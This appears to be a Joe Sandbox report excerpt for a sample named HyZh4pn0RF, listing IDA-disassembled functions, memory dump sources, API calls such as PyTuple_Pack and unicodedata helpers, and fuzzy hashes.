Associated: 00000002.00000002.1832420063.00007FFBAA572000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1832455166.00007FFBAA574000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbaa460000_HyZh4pn0RF.jbxd

Similarity

API ID: Arg_ArgumentSubtypeType_
String ID: a unicode character$argument$east_asian_width
API String ID: 1522575347-3913127203
Opcode ID: 43813d0d932ae7c374914bf6384df1a3629f4c3e0bd964f6072aa249f9af1373
Instruction ID: e1b2aff76acb8c9b0cb7eb1a159c4ffab8ca691c1cec9cbfa899dde117711ceb
Opcode Fuzzy Hash: 43813d0d932ae7c374914bf6384df1a3629f4c3e0bd964f6072aa249f9af1373
Instruction Fuzzy Hash: 0F21D4E5E0AB82C1EB568B32D5501B827A9EF45F84F4480B5FE0E03650EF3CE4968320

Function 00007FFBAB6B2BD0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_Py_Dealloc.PYTHON312 ref: 00007FFBAB6B2BD6
PyTuple_Pack.PYTHON312(?,?,?,?,?,?,00000000,?,?,00000000,00007FFBAB6A8F1A), ref: 00007FFBAB6B2C64
PyObject_SetAttr.PYTHON312(?,?,?,?,?,?,00000000,?,?,00000000,00007FFBAB6A8F1A), ref: 00007FFBAB6B2C7B
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6B2C91

Strings

<module>, xrefs: 00007FFBAB6B2CA2

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Dealloc$AttrObject_PackTuple_
String ID: <module>
API String ID: 4195104747-217463007
Opcode ID: faebbaeb77ca0f4f516b262e93004c19f89b7d84595a6b1439bf542028db819b
Instruction ID: 76499363aea2538c437b5bb452b6e98d72e8d9a6ff331e9dbe4504eabfb75f75
Opcode Fuzzy Hash: faebbaeb77ca0f4f516b262e93004c19f89b7d84595a6b1439bf542028db819b
Instruction Fuzzy Hash: 7521AEE5A8AA4685FA479FA9ED501B4A3B5BF05B90F44A83ACC2E06770DF3DA154C340

Function 00007FFBAB6B2D67 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_Py_Dealloc.PYTHON312 ref: 00007FFBAB6B2D6D
PyTuple_Pack.PYTHON312(?,?,?,?,?,?,00000000,?,?,00000000,00007FFBAB6A8F1A), ref: 00007FFBAB6B2DFB
PyObject_SetAttr.PYTHON312(?,?,?,?,?,?,00000000,?,?,00000000,00007FFBAB6A8F1A), ref: 00007FFBAB6B2E12
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6B2E28

Strings

<module>, xrefs: 00007FFBAB6B2E39

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Dealloc$AttrObject_PackTuple_
String ID: <module>
API String ID: 4195104747-217463007
Opcode ID: 75194c0cbc9a507f0b92e1b34c94570ff1e2da8f97792c352aaccb42d87fe693
Instruction ID: a0a3b70c5a1e941ba8d3021f569c35656372123f7f6d55ae44670f1c8321089d
Opcode Fuzzy Hash: 75194c0cbc9a507f0b92e1b34c94570ff1e2da8f97792c352aaccb42d87fe693
Instruction Fuzzy Hash: AB21B4E5E8BA1681EA479FA9EC501B4A3B5BF05B80F44A839CC2E17770EF3DA5558340

Function 00007FFBAB6B2A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 53COMMON

Download Yara Rule

APIs

_Py_Dealloc.PYTHON312 ref: 00007FFBAB6B2A46
PyTuple_Pack.PYTHON312(?,?,?,?,?,?,00000000,?,?,00000000,00007FFBAB6A8F1A), ref: 00007FFBAB6B2ACD
PyObject_SetAttr.PYTHON312(?,?,?,?,?,?,00000000,?,?,00000000,00007FFBAB6A8F1A), ref: 00007FFBAB6B2AE4
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6B2AFA

Strings

<module>, xrefs: 00007FFBAB6B2B0B

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Dealloc$AttrObject_PackTuple_
String ID: <module>
API String ID: 4195104747-217463007
Opcode ID: e4eff726a2b882ab3716e79be69498aa5b1f0e510f484dcc5ac300c35e7575a4
Instruction ID: fa1923492b082f12e78a8b2af4d511dc59cc7bdd57457a6c77500f301071264a
Opcode Fuzzy Hash: e4eff726a2b882ab3716e79be69498aa5b1f0e510f484dcc5ac300c35e7575a4
Instruction Fuzzy Hash: 2421D5B5E8AA5681EA479FA8ED501B5A3B4BF05B90F44A839CC2E06370DE3CA1118780

Function 00007FFBAB6B3434 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 53COMMON

Download Yara Rule

APIs

_Py_Dealloc.PYTHON312 ref: 00007FFBAB6B343A
PyTuple_Pack.PYTHON312(?,?,?,?,?,?,00000000,?,?,00000000,00007FFBAB6A8F1A), ref: 00007FFBAB6B34C1
PyObject_SetAttr.PYTHON312(?,?,?,?,?,?,00000000,?,?,00000000,00007FFBAB6A8F1A), ref: 00007FFBAB6B34D8
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6B34EE

Strings

<module>, xrefs: 00007FFBAB6B34FF

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Dealloc$AttrObject_PackTuple_
String ID: <module>
API String ID: 4195104747-217463007
Opcode ID: ee343125aa57c54faf244a34e48bc46db9da3b9588f8e1c1ef8b5bbee5cf8946
Instruction ID: fd7eff6ba5d697efe31d5ab9576cc8eb9e001c19f00dc49dc4f2d6a00d567e33
Opcode Fuzzy Hash: ee343125aa57c54faf244a34e48bc46db9da3b9588f8e1c1ef8b5bbee5cf8946
Instruction Fuzzy Hash: 3921C4B5E8BB5281EA479FACEC501B4A3B5BF15B90F44A83ACC2D46770EF3CA1548340

Function 00007FFBAB6B30DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 53COMMON

Download Yara Rule

APIs

_Py_Dealloc.PYTHON312 ref: 00007FFBAB6B30E3
PyTuple_Pack.PYTHON312(?,?,?,?,?,?,00000000,?,?,00000000,00007FFBAB6A8F1A), ref: 00007FFBAB6B316A
PyObject_SetAttr.PYTHON312(?,?,?,?,?,?,00000000,?,?,00000000,00007FFBAB6A8F1A), ref: 00007FFBAB6B3181
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6B3197

Strings

<module>, xrefs: 00007FFBAB6B31A8

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Dealloc$AttrObject_PackTuple_
String ID: <module>
API String ID: 4195104747-217463007
Opcode ID: ecdd50443da1972dac5f7d239e36a52e9dfd88a895bebb8cd24304ee5dc28952
Instruction ID: 69ce1baee8cc8fca32f2b82d49809164144f9f35e8a8577a1693f574dcf567c7
Opcode Fuzzy Hash: ecdd50443da1972dac5f7d239e36a52e9dfd88a895bebb8cd24304ee5dc28952
Instruction Fuzzy Hash: D121CFB5A8AB1681FA069FA8EC542B4B3B5BF05B91F44A839CC2E06371DF3DA155C340

Function 00007FFBAB6B28B0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 53COMMON

Download Yara Rule

APIs

_Py_Dealloc.PYTHON312 ref: 00007FFBAB6B28B6
PyTuple_Pack.PYTHON312(?,?,?,?,?,?,00000000,?,?,00000000,00007FFBAB6A8F1A), ref: 00007FFBAB6B293D
PyObject_SetAttr.PYTHON312(?,?,?,?,?,?,00000000,?,?,00000000,00007FFBAB6A8F1A), ref: 00007FFBAB6B2954
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6B296A

Strings

<module>, xrefs: 00007FFBAB6B297B

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Dealloc$AttrObject_PackTuple_
String ID: <module>
API String ID: 4195104747-217463007
Opcode ID: a16e5229b7237972c2ee806c9dd78c651fb2e9dfacde5010816b5e6c7d31e686
Instruction ID: b88db1b51d256a7e623945ef2f799489688dc82403e8159f40a6cb473f4c8816
Opcode Fuzzy Hash: a16e5229b7237972c2ee806c9dd78c651fb2e9dfacde5010816b5e6c7d31e686
Instruction Fuzzy Hash: 1121C6B5E8BB4685FA469FA9EC501B4A6B5BF05B80F44A839CD6D06271EF3CA5148340

Function 00007FFBAA464C5C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 53COMMON

Download Yara Rule

APIs

PyType_IsSubtype.PYTHON312 ref: 00007FFBAA464C88
_PyUnicode_ToNumeric.PYTHON312 ref: 00007FFBAA464CBB
PyErr_SetString.PYTHON312 ref: 00007FFBAA464CE3
PyFloat_FromDouble.PYTHON312 ref: 00007FFBAA464CFB

Strings

not a numeric character, xrefs: 00007FFBAA464CD9

Memory Dump Source

Source File: 00000002.00000002.1831536690.00007FFBAA461000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFBAA460000, based on PE: true

Associated: 00000002.00000002.1831396691.00007FFBAA460000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA465000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA4C2000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA50E000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA512000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA517000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA56F000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1832420063.00007FFBAA572000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1832455166.00007FFBAA574000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbaa460000_HyZh4pn0RF.jbxd

Similarity

API ID: DoubleErr_Float_FromNumericStringSubtypeType_Unicode_
String ID: not a numeric character
API String ID: 1034370217-2058156748
Opcode ID: c4f3043636e101a3a83274b1f0d06bc8cf9bfb138ae39ee1603926f77e7512ac
Instruction ID: c86beda425a800d156f3fe512cc49041f513cd6b8cf76c33f2b0ceffaabb2ece
Opcode Fuzzy Hash: c4f3043636e101a3a83274b1f0d06bc8cf9bfb138ae39ee1603926f77e7512ac
Instruction Fuzzy Hash: 94218EA1E0A942C5EF538F35E51013867A8AF54F84F0985B0ED4E57754EF3CE8838720

Function 00007FFBAA464358 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

PyType_IsSubtype.PYTHON312 ref: 00007FFBAA464384
_PyUnicode_ToDecimalDigit.PYTHON312 ref: 00007FFBAA4643A3
PyErr_SetString.PYTHON312 ref: 00007FFBAA4643C3
PyLong_FromLong.PYTHON312 ref: 00007FFBAA4643DD

Strings

not a decimal, xrefs: 00007FFBAA4643B9

Memory Dump Source

Source File: 00000002.00000002.1831536690.00007FFBAA461000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFBAA460000, based on PE: true

Associated: 00000002.00000002.1831396691.00007FFBAA460000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA465000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA4C2000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA50E000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA512000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA517000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA56F000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1832420063.00007FFBAA572000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1832455166.00007FFBAA574000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbaa460000_HyZh4pn0RF.jbxd

Similarity

API ID: DecimalDigitErr_FromLongLong_StringSubtypeType_Unicode_
String ID: not a decimal
API String ID: 3750391552-3590249192
Opcode ID: 0cf26f43277d2d65cd436f04c55e3f115854bb953c5d4c83dfc8717dffaf923a
Instruction ID: a5358d68c2a1ebb291ecb91472d666d8983dfd42949b2129b9dac8b61c97c92d
Opcode Fuzzy Hash: 0cf26f43277d2d65cd436f04c55e3f115854bb953c5d4c83dfc8717dffaf923a
Instruction Fuzzy Hash: AA1146B1F2A642C1EF568B35D55413C2799AF84F84F4444B5ED4E87694EF3CE4C28721

Function 00007FFBAA464BA8 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 46COMMON

Download Yara Rule

APIs

_PyArg_CheckPositional.PYTHON312 ref: 00007FFBAA464BE3
_PyArg_BadArgument.PYTHON312 ref: 00007FFBAA464C18

Strings

numeric, xrefs: 00007FFBAA464BDC, 00007FFBAA464C0A
argument 1, xrefs: 00007FFBAA464C11
a unicode character, xrefs: 00007FFBAA464C03

Memory Dump Source

Source File: 00000002.00000002.1831536690.00007FFBAA461000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFBAA460000, based on PE: true

Associated: 00000002.00000002.1831396691.00007FFBAA460000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA465000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA4C2000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA50E000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA512000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA517000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA56F000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1832420063.00007FFBAA572000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1832455166.00007FFBAA574000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbaa460000_HyZh4pn0RF.jbxd

Similarity

API ID: Arg_$ArgumentCheckPositional
String ID: a unicode character$argument 1$numeric
API String ID: 3876575403-2385192657
Opcode ID: 52c217464d75848053b49b711c04e020a7b03085db03b8c2e29089cfeafef3ec
Instruction ID: 5d5cd46cf2f962c9a4f016e8f875c4432af0dc3b06b6d2c1eb3c5991bff672d1
Opcode Fuzzy Hash: 52c217464d75848053b49b711c04e020a7b03085db03b8c2e29089cfeafef3ec
Instruction Fuzzy Hash: 67119DB1A0AB82D5EB529F62E5401A97368EB44F84F484076EE1D47B68DF3CE586C310

Function 00007FFBAA4642A4 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 46COMMON

Download Yara Rule

APIs

_PyArg_CheckPositional.PYTHON312 ref: 00007FFBAA4642DF
_PyArg_BadArgument.PYTHON312 ref: 00007FFBAA464314

Strings

decimal, xrefs: 00007FFBAA4642D8, 00007FFBAA464306
argument 1, xrefs: 00007FFBAA46430D
a unicode character, xrefs: 00007FFBAA4642FF

Memory Dump Source

Source File: 00000002.00000002.1831536690.00007FFBAA461000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFBAA460000, based on PE: true

Associated: 00000002.00000002.1831396691.00007FFBAA460000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA465000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA4C2000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA50E000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA512000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA517000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA56F000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1832420063.00007FFBAA572000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1832455166.00007FFBAA574000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbaa460000_HyZh4pn0RF.jbxd

Similarity

API ID: Arg_$ArgumentCheckPositional
String ID: a unicode character$argument 1$decimal
API String ID: 3876575403-2474051849
Opcode ID: 9348c28e7ebcd46bb31e1bfa83ec9fe388dc58031527a9d4dedc035c740255b6
Instruction ID: 10b38ec17dac5cc092e05916b8805fc532b84063927295c6cd04783d2a610fa1
Opcode Fuzzy Hash: 9348c28e7ebcd46bb31e1bfa83ec9fe388dc58031527a9d4dedc035c740255b6
Instruction Fuzzy Hash: A3119DB1B1AB82D5EB519F62E5400A97368EB44F84F588476EE1D43754DF3CE58BC320

Function 00007FFBAA464A68 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 46COMMON

Download Yara Rule

APIs

_PyArg_CheckPositional.PYTHON312 ref: 00007FFBAA464AA3
_PyArg_BadArgument.PYTHON312 ref: 00007FFBAA464AD8

Strings

argument 1, xrefs: 00007FFBAA464AD1
name, xrefs: 00007FFBAA464A9C, 00007FFBAA464ACA
a unicode character, xrefs: 00007FFBAA464AC3

Memory Dump Source

Source File: 00000002.00000002.1831536690.00007FFBAA461000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFBAA460000, based on PE: true

Associated: 00000002.00000002.1831396691.00007FFBAA460000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA465000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA4C2000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA50E000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA512000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA517000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA56F000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1832420063.00007FFBAA572000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1832455166.00007FFBAA574000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbaa460000_HyZh4pn0RF.jbxd

Similarity

API ID: Arg_$ArgumentCheckPositional
String ID: a unicode character$argument 1$name
API String ID: 3876575403-4190364640
Opcode ID: 3b9125b5b1efe8070f8bfaa69a26c5d9a925344cea38a0d903252173c94026c9
Instruction ID: ab617f81f41eb207e35ffc91b706a4568fa46d1121764124b689f2184baa128e
Opcode Fuzzy Hash: 3b9125b5b1efe8070f8bfaa69a26c5d9a925344cea38a0d903252173c94026c9
Instruction Fuzzy Hash: 87118BB1E0AA82D5EB52DF62E5401A9B368EB48F84F484072EE0D47758DF78E586C324

Function 00007FFBAB6B2E6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36COMMON

Download Yara Rule

APIs

PyDict_SetItem.PYTHON312 ref: 00007FFBAB6B2E8C
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6B2EAA
PyTuple_Pack.PYTHON312(?,?,?,?,?,?,00000000,?,?,00000000,00007FFBAB6A8F1A), ref: 00007FFBAB6B2EC4

Strings

>, xrefs: 00007FFBAB6B2ED8
<module>, xrefs: 00007FFBAB6B3822

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: DeallocDict_ItemPackTuple_
String ID: <module>$>
API String ID: 4228545439-4024159097
Opcode ID: 4e122b1be13b90b9fde975fa5c7cafe2c707fcb1664262955b8b1ef10f53763c
Instruction ID: 2d14c57fdeea0037fe6b3573cecb563e8ade9bb6624d5e620e9c9ffe3a100007
Opcode Fuzzy Hash: 4e122b1be13b90b9fde975fa5c7cafe2c707fcb1664262955b8b1ef10f53763c
Instruction Fuzzy Hash: 880140F2A8BA0281F7134BBDDC50274A6B1AF40B90F44E435CD2D063B1DF3DA4428300

Function 00007FFBAA4641B8 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 35COMMON

Download Yara Rule

APIs

_PyArg_BadArgument.PYTHON312 ref: 00007FFBAA4641E8
PyErr_Occurred.PYTHON312 ref: 00007FFBAA464217

Strings

combining, xrefs: 00007FFBAA4641E1
a unicode character, xrefs: 00007FFBAA4641D3
argument, xrefs: 00007FFBAA4641DA

Memory Dump Source

Source File: 00000002.00000002.1831536690.00007FFBAA461000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFBAA460000, based on PE: true

Associated: 00000002.00000002.1831396691.00007FFBAA460000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA465000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA4C2000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA50E000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA512000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA517000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA56F000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1832420063.00007FFBAA572000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1832455166.00007FFBAA574000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbaa460000_HyZh4pn0RF.jbxd

Similarity

API ID: Arg_ArgumentErr_Occurred
String ID: a unicode character$argument$combining
API String ID: 3979797681-4202047184
Opcode ID: 0010389201683798248f81cc769f89e95aab19bcf9dbd2fef4c49c29bb1cbe83
Instruction ID: a9e60ec01184eb7d64be78b5aca14d550ab6ee61d1fcfd994151d30bf1ef04a8
Opcode Fuzzy Hash: 0010389201683798248f81cc769f89e95aab19bcf9dbd2fef4c49c29bb1cbe83
Instruction Fuzzy Hash: 3C01B1E1E0A642C1EE168B71E8400B923A8FF09F94F940675ED4D43690EE3CE5468721

Function 00007FFBAA464974 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 35COMMON

Download Yara Rule

APIs

_PyArg_BadArgument.PYTHON312 ref: 00007FFBAA4649A4
PyErr_Occurred.PYTHON312 ref: 00007FFBAA4649D3

Strings

mirrored, xrefs: 00007FFBAA46499D
a unicode character, xrefs: 00007FFBAA46498F
argument, xrefs: 00007FFBAA464996

Memory Dump Source

Source File: 00000002.00000002.1831536690.00007FFBAA461000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFBAA460000, based on PE: true

Associated: 00000002.00000002.1831396691.00007FFBAA460000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA465000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA4C2000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA50E000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA512000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA517000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA56F000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1832420063.00007FFBAA572000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1832455166.00007FFBAA574000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbaa460000_HyZh4pn0RF.jbxd

Similarity

API ID: Arg_ArgumentErr_Occurred
String ID: a unicode character$argument$mirrored
API String ID: 3979797681-4001128513
Opcode ID: ea2d28226fddc5d11e335db1b9ed7ab3f9b437e3c69b8b684c3fa5e494c2232a
Instruction ID: 0f02f941dd36a85397d87a75a82ecc68b08887d5640d23346e0cede4e126a89d
Opcode Fuzzy Hash: ea2d28226fddc5d11e335db1b9ed7ab3f9b437e3c69b8b684c3fa5e494c2232a
Instruction Fuzzy Hash: 2401D4E0E0A643C1EE568B31E4401B92398FF4DF94F544675FE4D43290EE3CE18A8721

